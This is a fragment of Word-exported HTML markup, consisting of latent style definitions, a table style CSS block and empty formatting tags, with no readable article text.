<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hashtag"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Unresolved Mention"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Smart Link"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri",sans-serif;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;
mso-fareast-language:EN-US;}
</style>
<![endif]--></span><div style="margin-left: 40px;"><span style="font-family: inherit;"><span style="font-style: italic; font-weight: bold;"> <br /></span></span></div><span style="font-family: inherit;"><br /><br /><br /><br /></span><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;"><br /></span></div>
